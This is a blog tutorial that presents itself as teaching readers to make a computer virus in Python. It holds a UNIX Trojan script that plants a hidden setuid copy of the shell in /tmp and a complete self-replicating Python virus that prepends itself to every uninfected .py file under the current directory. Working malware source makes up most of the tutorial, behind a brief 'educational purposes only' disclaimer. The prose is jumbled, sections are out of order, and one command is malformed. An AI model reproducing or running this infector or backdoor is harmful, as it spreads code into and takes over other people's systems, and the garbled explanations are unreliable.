How to make Computer Virus Using Python – Within 10 Minutes. Newbie to Advance Tutorials.

0

NOTE: Please Don’t use the online compiler is not going to work here. Please install Python 2.7x to the latest version and cv2(OpenCV), argparse modules to actually try out this example.

Hey friends! Welcome back! Before continuing on with Malicious Logic, after reading this blog you will be able to make a Computer Virus Using Python – Within 10 Minutes. Newbie to Advance Tutorials.

Now, this article will focus more on applications than the theory of computer viruses, worms, and Trojan horses.

But, please note that this article is meant to be used for educational purposes only. I am not promoting the usage of viruses, worms, or trojan horses to attack computer systems and causing damage.

What is Malicious logic?

Malicious logic is a set of instructions (basically a program) that causes the violation of a security policy of a website/program/application, etc.

    cp /bin/sh /tmp/.xxsh
    chmod u+s,o+x /tmp/.xxsh
    rm ./ls
    ls $*

UNIX Script

In this example, we are assuming that “………” is in the path environment and the script has been named ls and is placed in the directory.

Analyzing the script


This script creates a replica of the UNIX Shell this is setuid of the user executing this program. To apprehend setuid programs, we first want to apprehend how User Identity is saved in a UNIX OS.
In UNIX OS, user identification is commonly represented as an integer among zero and generally, 65,535. This quantity is likewise called UID (Unique Identification Number). Now, what setuid programs do is that they devise approaches with the UID of the proprietor and are now no longer of a 3rd person executing the software. This means, that an executor could have the rights of the proprietor… This in itself is a probable vulnerability.
Coming again to our script, so a setuid reproduction of the UNIX shell changed into created. Later on, this software is deleted, after which the proper ls command (for list the documents and folders present in the current running directory) is executed.

Trojan Horses

Go back to the previous script… Suppose if someone (root) typed:

If the script was typed deliberately, then it will result in a Trojan Horse.

Virus – A basic format

Most computer viruses follow the following basic script:

    cp /bin/sh /tmp/.xxsh
    chmod o+s,w+x /tmp.xxsh

You May Like Other Tutorials;

How to make News Portal Website in 10 Minutes.

How to Design the user interface of the Creative Neumorphism ID tag using CSS and HTML.

Beginvirus
if spread-condition TRUE then begin
    for the target files begin
       if target affected TRUE then begin
          Determine where to place virus instructions
          Copy the virus instructions
          Modify target to spread the virus later
       End if
    End for
End if
Perform some other instruction(s) //Optional
Go back to beginning
Endvirus

Basically, every computer virus has two phases –

#!/usr/bin/python
import os, datetime, inspect
DATA_TO_INSERT = "CODEWITHNEPAL"

#search for target files in path
def search(path):
	filestoinfect = []
	filelist = os.listdir(path)
	for filename in filelist:
		
		#If it is a folder
		if os.path.isdir(path+"/"+filename):
			filestoinfect.extend(search(path+"/"+filename))
			
		#If it is a python script -> Infect it	
		elif filename[-3:] == ".py":
			
			#default value
			infected = False
			for line in open(path+"/"+filename):
				if DATA_TO_INSERT in line:
					infected = True
					break
			if infected == False:
				filestoinfect.append(path+"/"+filename)
	return filestoinfect

#changes to be made in the target file
def infect(filestoinfect):
	target_file = inspect.currentframe().f_code.co_filename
	virus = open(os.path.abspath(target_file))
	virusstring = ""
	for i,line in enumerate(virus):
		if i>=0 and i <41:
			virusstring += line
	virus.close
	for fname in filestoinfect:
		f = open(fname)
		temp = f.read()
		f.close()
		f = open(fname,"w")
		f.write(virusstring + temp)
		f.close()
		
#Not required actually		
def explode():
	if datetime.datetime.now().month == 4 and datetime.datetime.now().day == 1:
			print ("HAPPY APRIL FOOL'S DAY!!")
filestoinfect = search(os.path.abspath(""))
infect(filestoinfect)
explode()
  1. Insertion phase – in this phase, the virus inserts itself into the target.
  2. Execution phase– in this phase, the virus performs some actions.

Let’s take a look at a real virus in Python. Now, this is not an actual virus that will cause corruption files, deletion of system files, etc. but just a simple harmless virus.

LEAVE A REPLY

Please enter your comment!
Please enter your name here